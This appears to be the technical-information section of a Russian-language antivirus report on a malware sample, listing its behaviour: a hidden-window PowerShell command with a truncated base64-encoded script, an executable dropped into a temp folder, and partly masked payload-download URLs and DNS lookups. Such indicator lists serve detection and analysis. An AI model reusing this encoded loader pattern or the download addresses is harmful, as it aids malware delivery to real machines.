Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXAHQAdQByADAAOQAxAD0AKAAoACcAUQAnACsAJwBkAHgAJwApACsAKAAnADEAOQBtACcAKwAnADkAJwApACkAOwAuACgAJwBuACcAKwAnAGUAdwAtAGkAJwArACcAdABlAG0AJwApACAAJABFAG4AVgA6AHQARQBNAHAAXAB3AE8AUgBEAFwAMgAwAD...
- %WINDIR%\explorer.exe
- %TEMP%\word\2019\y85mi4vtd.exe
- %ProgramFiles%\UNP\Logs\UpdateNotificationPipeline.001.etl
- http://qs##ide.com/img/0/
- http://ts##ear.com/wp-content/uploads/2015/06/pz/
- http://ve####iyaahi.com/cgi-bin/8/
- http://www.ve####iyaahi.com/cgi-bin/8/
- http://www.we###bor.com.br/avisos/QIU9/
- http://vi####usrangel.com/experimental/VIhMh1/
- DNS ASK qs##ide.com
- DNS ASK ts##ear.com
- DNS ASK ve####iyaahi.com
- DNS ASK we###bor.com.br
- DNS ASK vi####usrangel.com
- DNS ASK we##vac.com
- DNS ASK vi##all.eu
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXAHQAdQByADAAOQAxAD0AKAAoACcAUQAnACsAJwBkAHgAJwApACsAKAAnADEAOQBtACcAKwAnADkAJwApACkAOwAuACgAJwBuACcAKwAnAGUAdwAtAGkAJwArACcAdABlAG0AJwApACAAJABFAG4AVgA6AHQARQBNAHAAXAB3AE8AUgBEAFwAMgAwAD...' (со скрытым окном)
- '<SYSTEM32>\devicecensus.exe' UserCxt
- '<SYSTEM32>\svchost.exe' -k netsvcs -p